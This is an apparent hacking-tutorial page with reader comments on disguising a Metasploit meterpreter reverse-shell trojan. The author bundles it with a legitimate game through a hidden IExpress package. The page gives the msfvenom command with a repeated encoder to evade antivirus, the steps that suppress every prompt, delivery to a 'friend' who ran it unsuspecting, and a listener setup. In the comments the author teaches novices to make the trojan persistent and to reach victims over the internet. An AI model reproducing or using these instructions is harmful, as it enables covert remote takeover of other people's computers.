How To: Make a Trojan Appear Legitimate

Make a Trojan Appear Legitimate

How to Make a Trojan Appear Legitimate

So, we all probably know that when you run a trojan made by Metasploit, nothing will appear to happen. This is a sign for me to immediately check my Task Manager, but for an unsuspecting victim, it will just seem like a broken file. It is likely that they will delete this "broken file" once they see that it "doesn't work." In order to prevent this, we need to disguise the trojan.

This tutorial is meant to disguise trojans for Windows.

Step 1: Generate the Trojan

You can generate any Windows payload you want, but I would recommend encoding it in VBScript format. I find this to be detected by AV much less than an executable. I guess it's priorities. ;)

For this tutorial, I'll be encoding it with MSFvenom.

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -f vbs LHOST=<IP> LPORT=<port> > root/Desktop/trojan.vbs (You can call it whatever you want.)

  • msfvenom -p windows/meterpreter/reverse_tcp: This tells Metasploit what payload to use. You can do any payload you want.
  • -e x86/shikata_ga_nai -i 62 -f vbs: Encoder to use, amount of times to encode, and output format.
  • LHOST=yourIP LPORT=443 > /root/Desktop/trojan.vbs: This tells is what IP and port to use (make sure you put in your own IP address!) It then saves it to the Desktop.

Step 2: Move It to a Windows Computer

Use a USB stick or some other way to transfer the trojan to a Windows computer.

NOTE: When I compile the trojan with the game later, just note that I'm not using the one in this screenshot. That was just a coincidence. No, I'll be using my own game. So please don't call out "That's not your game!"

Step 3: Using IExpress (On Windows)

Open IExpress as an administrator (this is very important!) and select "Create new Self Extracting Derivative file" and hit "Next."

The rest of the process goes as follows:

  1. Choose "Extract files and run installation command." (Next)
  2. Enter your package title (something related to your legitimate executable).
  3. Choose "No prompt." (Next) This will run the executable without confirmation.
  4. Select "Don't display license. (Next) This will keep a license screen from appearing (remember, we don't want this to look like an installer, just a regular game).
  5. Add your trojan and legitimate executable. In this case I'll just use a game I made for the legitimate executable. (Next)

IMPORTANT: The executable you choose must be a stand-alone, unless you manually add all of its components (.dll, etc.).

  1. In the "Install program" box, type "cscript trojan.vbs" or whatever your trojan is called. If it's an executable, just select your executable. In the "Post installation command," click on your legitimate executable. (Next)
  2. Click "Hidden." (Next)
  3. Select "No message." (Next) This will prevent a screen from popping up once the victim closes the legitimate executable saying "Installation complete!" or anything of the like.
  4. Enter the name & destination folder and check both boxes. (Next)
  5. Choose "No restart." (Next)
  6. Choose "Don't save." (Next) This will prevent IExpress from saving a save file of the executable it will generate.
  7. When you're ready to create the package, press "Next." Wait for it to finish.

Step 4: Send It to Someone

Now it's all ready to go! Make sure you set up a listener with Metasploit! I personally uploaded this to my web server and sent the link to my friend. They ran it without any suspicion.

There's some social engineering for you, Cameron. ;)

VBScript Is Hard to Detect

I don't know exactly why (I think it's priority scanning), but anti-virus doesn't detect VBScripts as well as they do with executables, so your trojan will be harder to find if you did it the way I did. I passed mine by Malwarebytes with flying colors!

Conclusion

Not to make you paranoid, but now you know that not all trojans have to look "broken." You can make them seem very legitimate by compiling them with IExpress. You could probably do the same thing with a Linux program, but Windows trusts programs made by Windows. Microsoft needs to fix that. ;)

C|H of C3

58 Comments

it even avoided Malwarebytes?! dayum, nice job!

-Phoenix750

I will be messing around with this in my lab when I get the chance.

Very very very cool. Thanks Hacker.

what if i maybe ran the trojan on my own pc by a mistake? How can i remove it again if the anti virus doesnt detect it!

great tuto by the way :)

There's no need to remove it if t's yours. YOU are not controlling it, so nothing is happening. Besides, once you shutdown your computer, the process will go away.

Now, if it's someone else's virus, check Task Manager immediately for unrecognized processes, and close once that sound suspicious (like a process in all lowercase "windows host process" instead of "Windows Host Process.")

just to make sure, are you telling me if the victim have downloaded my rat succesfully and then shuts down her/his pc and turn it on again the rat is gone, and i cant acces it?

No, the file won't go away, but the process will be gone unless you set it to run at startup (which is a good idea). Move the trojan to the "Starup" folder.

i knew it sounds rly stupid but what does the trojan actually do to the victims computer does it only slow it down?

No, it executes a payload that let's you connect to them.

wow, so i can control their pc?! :O

does it only work on lan or is it global so i could for example control the victims pc from another place. If that is true, do you know what i should search for to find a tuto about how to do that?

Yes, you can do that. There's no need to find another tutorial. Just set the LHOST for MSFpayload/MSFvenom as your external IP address, and port forward the port you're using.

unexpected disconnects of connection avoid everything.

I managed to play with this in my lab, worked a treat. Thanks again for posting this.

Thanks for the appreciation. It makes my day (well, night technically. It's 1:15 AM here).

When generating the Trojan why do you use your own IP address? Will that make it traceable back to you?

PS- I know a fraction of fu#k all about any of this, so forgive me if this is a silly question with an obvious answer. Cheers.

In this case, it needs to know where to connect back to you and yes, it can lead to being traced back to you.

...that way the payload can find you and complete a connection.

how do i find my Local port?
(i know its a stupid quistion, i looked it up on google but i couldnt find it)
><

The local port is the port you choose to connect back on. There's no definite answer.

Sorry, but do you mean i shall find out what the port to my int. connection is`? For thats the problem i dont know how to find out what my port is :/

Just choose a random port, like 4444.

Exactly. To me, it's like John Smith. ;)

Not so random ah

hey when i got the rat installed on the victims pc and then shutdown the pc (non persistent mode-nothing is safed) and open the pc again. Can i then still remote control to the rat file even tho nothing got safed?! If i can what shall i do?

Sorry if its a silly quistion but, this is my first time playing around with RAT's

No, because there is nothing to inject the payload.

So what if my pc are saving my payload, then I should be able to get acces to my rat again right? And if the victim shutdowns his pc and turns it on again, the rat will still be there for me to acces right? or will i have to send him a new?

p.s. how do i set up a listener to the rat file?
(I know its a lot of quistions, but im new to all this)

If the file was saved, it will still be there after reboot, but you have to wait for him to open it again. In order to fix this, after you initially get control, move the trojan to the "Startup" folder so it runs on boot.

As for setting up a listener...

use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <your IP>
set LPORT <port>
exploit

wow this is awesome! So basically everytime im using this to start up a listener:

use multi/handler
set payload windows/meterpreter/reversetcp
set lhost
set lport
exploit

-I will get control over their pc again? (if I of couse made the RAT persistent.)

Thanks a lot Cracker Hacker

As long as the RAT is persistent, yes. :)

My listener doesnt detect anything, I'm literally spamming the exe file (the rat) and nothing happens. I think something went wrong. But I did exactly what you wrote in the post?!

Is the exe file meant to make something appear? Like an installation box?

If it's an executable, don't use "cscript trojan.exe". Cscript is meant for VBScript. Just select the executable.

,

It seems that Kali is not on the same network as your host machine. Try pinging the Windows machine IP from Kali.

Another thing, and I will update this, but try msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 62 -f vbs LHOST=<IP> LPORT=<port> > trojan.vbs.

.

No, no. Trying pinging the Windows machine from Kali. You will obviously have different local IP addresses.

yeah, i see... I got two diffrent local ip adresses.(i pinged it) But how should that help me? what shall i do to fix all this?!

If the ping was successful, that means you're on the same network.

we are on the same network, but with two diffrents local ip adresses?

i used ipconfig/ifconfig - am i totally wrong?

But if im fine, what is the problem then? why doesnt it work?!

What are your VM network settings?

I dont know its regular - NAT
I havent done anything or change anything in the network settings

okay done shall i give it a try again?

Yes. Bridged mode is better as you get an ip which looks quite the same as your own ip in the network

hmm but now i got this error

its in my lagnuese but it says:
Error/fejl: I dont have permission
code:800A0046
Source/reason: microsoft VBSscript driving error /or/ microsoft failed to run VBSscript

I don't know....
Try running it as admin ...

i cant run the vbs as admin - there is no such option

It shouldn't affect the VBScript... see if re-generating fixes it.

,

That error simply indicates metasploit could not connect to the PostgreSQL database. More than likely it isn't running. The easiest way is before running msfconsole go to Applications > Kali Linux > System Services > Metasploit > community / pro start . I doubt this is the cause of you issue though.

It happened to me in the VM as well, but I don't remember how I fixed it. I messed around with settings.

Can i replace my local ip with my external ip and then i can do it global?

It keep saying this when it's creating the package in IExpress.

Since i updated to windows 10, it doesnt work (But it worked on windows 8.1). Maybe I need to rework the rat file?

Anyone who know how to rework the rat file to work on windows 10 OS?

Share Your Thoughts

  • Hot
  • Latest